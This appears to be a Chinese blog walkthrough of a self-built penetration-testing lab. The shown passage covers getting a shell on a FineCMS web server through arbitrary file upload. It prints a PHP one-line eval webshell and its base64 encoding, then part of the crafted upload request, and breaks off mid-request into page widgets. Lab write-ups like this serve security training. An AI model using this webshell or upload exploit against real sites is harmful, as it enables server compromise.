自建靶场2022

目录

一、靶场介绍

二、拿下web服务器

2.1 任意文件上传拿shell

2.2 反弹meterpreter

2.3 提权

2.4 抓取hash

三、内网渗透

3.1信息收集

3.2 配置代理

3.3 nmap扫描端口

3.4 漏洞利用

3.5 远程登录

四、补充:提权

4.1 本地提权

4.2 远程提权


一、靶场介绍

本靶场是一个简单的内网渗透靶场。需要首先拿到win2008服务器的权限,再渗透内网拿下WinXP,win2008上没有flag,flag在WinXP上。综合考验许多知识,暂未使用防护软件,属于一个比较基础的靶场。

主要配置如下:

系统

ip地址

kali 2020

192.168.1.106

win10 (本机)

192.168.1.104

win2008

192.168.1.107

winxp

10.101.10.133

靶场链接如下:

链接:https://pan.baidu.com/s/14WRh6C8Fdpk5hfmZ9ar8Uw

提取码:ehs8

ps:win10和kali自备

分享多了怕被封,所以目前是10名额,应该打靶场的人也不多。

二、拿下web服务器

2.1 任意文件上传拿shell

nmap 192.168.1.107 -p 8069 -sV

8069端口是web端口,访问 http://192.168.1.107:8069/ 发现是finecms。

百度搜索finecms漏洞

(15条消息) finecms前台任意文件上传——getshell_W小哥-CSDN博客_任意文件上传getshell

前台注册

首先上传一个正常的头像,找到路径

 <?php @eval($_POST['a']); ?>  # 一句胡木马base64加密
IDw/cGhwIEBldmFsKCRfUE9TVFsnYSddKTsgPz4=

构造数据包如下

POST /index.php?s=member&c=account&m=upload&iajax=1 HTTP/1.1
Host: 192.168.1.107:8069
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.107:8069/index.php?s=member&c=account&m=avatar
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 9393
Connection: close
Cookie: 24b16fede9a67c9251d3e7c7161c83ac_ci_session=3t2cf0ogg6kuvah0r0mjc4l35a08hv57; member_uid=4; member_cookie=be3
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值